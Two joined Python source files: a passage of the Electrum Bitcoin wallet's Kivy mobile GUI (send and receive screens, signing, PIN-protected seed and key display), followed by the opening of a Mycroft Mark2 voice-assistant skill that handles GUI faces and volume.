#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units, NoDynamicFeeEstimates
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == b.get_name():
self.network.follow_chain(index)
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Current orientation of the window.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum: Wallet not found or action needed. Launching install wizard')
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
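# _sign_tx runs off the Kivy main thread; success and failure callbacks are
# marshalled back onto the UI thread via Clock.schedule_once below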
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast_transaction(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
__init__.py
|
# Copyright 2018 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import astral
import time
import arrow
from pytz import timezone
from datetime import datetime
from mycroft.messagebus.message import Message
from mycroft.skills.core import MycroftSkill
from mycroft.util import get_ipc_directory
from mycroft.util.log import LOG
from mycroft.util.parse import normalize
from mycroft import intent_file_handler
import os
import subprocess
import pyaudio
from threading import Thread, Lock
from .listener import (get_rms, open_mic_stream, read_file_from,
INPUT_FRAMES_PER_BLOCK)
# Definitions used when sending volume over i2c
VOL_MAX = 30
VOL_OFFSET = 15
VOL_SMAX = VOL_MAX - VOL_OFFSET
VOL_ZERO = 0
def compare_origin(m1, m2):
origin1 = m1.data['__from'] if isinstance(m1, Message) else m1
origin2 = m2.data['__from'] if isinstance(m2, Message) else m2
return origin1 == origin2
def clip(val, minimum, maximum):
""" Clips / limits a value to a specific range.
Arguments:
val: value to be limited
minimum: minimum allowed value
maximum: maximum allowed value
"""
return min(max(val, minimum), maximum)
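# e.g. clip(1.2, 0.0, 1.0) == 1.0 and clip(-5, 0, 63) == 0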
class Mark2(MycroftSkill):
"""
The Mark2 skill handles much of the GUI activity related to
Mycroft's core functionality. This includes showing "listening",
"thinking", and "speaking" faces as well as more complicated things
such as switching to the selected resting face and handling
system signals.
"""
def __init__(self):
super().__init__('Mark2')
self.i2c_channel = 1
self.idle_screens = {}
self.override_idle = None
self.idle_next = 0 # Next time the idle screen should trigger
self.idle_lock = Lock()
self.settings['auto_brightness'] = False
self.settings['use_listening_beep'] = True
self.has_show_page = False # resets with each handler
# Volume indicator
self.thread = None
self.pa = pyaudio.PyAudio()
try:
self.listener_file = os.path.join(get_ipc_directory(), 'mic_level')
self.st_results = os.stat(self.listener_file)
except Exception:
self.listener_file = None
self.st_results = None
self.max_amplitude = 0.001
# System volume
self.volume = 0.5
self.muted = False
self.get_hardware_volume() # read from the device
def setup_mic_listening(self):
""" Initializes PyAudio, starts an input stream and launches the
listening thread.
"""
listener_conf = self.config_core['listener']
self.stream = open_mic_stream(self.pa,
listener_conf.get('device_index'),
listener_conf.get('device_name'))
self.amplitude = 0
def initialize(self):
""" Perform initalization.
Registers messagebus handlers and sets default gui values.
"""
enclosure_info = self.config_core.get('enclosure', {})
self.i2c_channel = enclosure_info.get('i2c_channel',
self.i2c_channel)
self.brightness_dict = self.translate_namedvalues('brightness.levels')
self.gui['volume'] = 0
# Prepare GUI Viseme structure
self.gui['viseme'] = {'start': 0, 'visemes': []}
# Preselect Time and Date as resting screen
self.gui['selected'] = self.settings.get('selected', 'Time and Date')
self.gui.set_on_gui_changed(self.save_resting_screen)
try:
self.add_event('mycroft.internet.connected',
self.handle_internet_connected)
# Handle the 'waking' visual
self.add_event('recognizer_loop:record_begin',
self.handle_listener_started)
self.add_event('recognizer_loop:record_end',
self.handle_listener_ended)
self.add_event('mycroft.speech.recognition.unknown',
self.handle_failed_stt)
# Handle the 'busy' visual
self.bus.on('mycroft.skill.handler.start',
self.on_handler_started)
self.bus.on('recognizer_loop:sleep',
self.on_handler_sleep)
self.bus.on('mycroft.awoken',
self.on_handler_awoken)
self.bus.on('enclosure.mouth.reset',
self.on_handler_mouth_reset)
self.bus.on('recognizer_loop:audio_output_end',
self.on_handler_mouth_reset)
self.bus.on('enclosure.mouth.viseme_list',
self.on_handler_speaking)
self.bus.on('gui.page.show',
self.on_gui_page_show)
self.bus.on('gui.page_interaction', self.on_gui_page_interaction)
self.bus.on('mycroft.skills.initialized', self.reset_face)
self.bus.on('mycroft.mark2.register_idle',
self.on_register_idle)
self.add_event('mycroft.mark2.reset_idle',
self.restore_idle_screen)
# Handle device settings events
self.add_event('mycroft.device.settings',
self.handle_device_settings)
